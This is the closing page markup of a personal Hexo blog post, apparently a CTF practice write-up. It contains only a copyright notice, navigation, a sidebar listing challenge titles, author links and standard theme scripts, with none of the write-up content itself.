<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Peguin
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://yoursite.com/2020/07/11/vacation2/" title="vacation2">http://yoursite.com/2020/07/11/vacation2/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/2.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/buu/" rel="tag"># buu</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/07/09/vacation1/" rel="prev" title="vacation1">
      <i class="fa fa-chevron-left"></i> vacation1
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/07/13/FireshellCTF2020/" rel="next" title="FireshellCTF2020">
      FireshellCTF2020 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#CSAWQual-2016-i-got-id"><span class="nav-number">1.</span> <span class="nav-text">[CSAWQual 2016]i_got_id</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#BSidesCF-2019-Sequel"><span class="nav-number">2.</span> <span class="nav-text">[BSidesCF 2019]Sequel</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#NPUCTF2020-web🐕"><span class="nav-number">3.</span> <span class="nav-text">[NPUCTF2020]web🐕</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#b01lers2020-Space-Noodles"><span class="nav-number">4.</span> <span class="nav-text">[b01lers2020]Space Noodles</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#BSidesCF-2020-Cards"><span class="nav-number">5.</span> <span class="nav-text">[BSidesCF 2020]Cards</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PwnThyBytes-2019-Baby-SQL"><span class="nav-number"></span> <span class="nav-text">[PwnThyBytes 2019]Baby_SQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Zer0pts2020-phpNantokaAdmin"><span class="nav-number"></span> <span class="nav-text">[Zer0pts2020]phpNantokaAdmin</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CISCN2019-东北赛区-Day2-Web3-Point-System"><span class="nav-number"></span> <span class="nav-text">[CISCN2019 东北赛区 Day2 Web3]Point System</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows-HITCON-2019-Buggy-Net"><span class="nav-number"></span> <span class="nav-text">[Windows][HITCON 2019]Buggy_Net</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#b01lers2020-Scrambled"><span class="nav-number"></span> <span class="nav-text">[b01lers2020]Scrambled</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pasecactf-2019-flask-ssti"><span class="nav-number"></span> <span class="nav-text">[pasecactf_2019]flask_ssti</span></a></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Peguin"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">Peguin</p>
  <div class="site-description" itemprop="description">敢于去想，才会有MEteor的光芒闪耀。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">107</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">40</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ambitiousleader/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ambitiousleader&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/601209387@qq.com" title="E-Mail → 601209387@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/6772435317/home?wvr=5&sudaref=graph.qq.com" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;6772435317&#x2F;home?wvr&#x3D;5&amp;sudaref&#x3D;graph.qq.com" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Peguin</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  


  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/fireworks.js"></script>
  


</body>
</html>
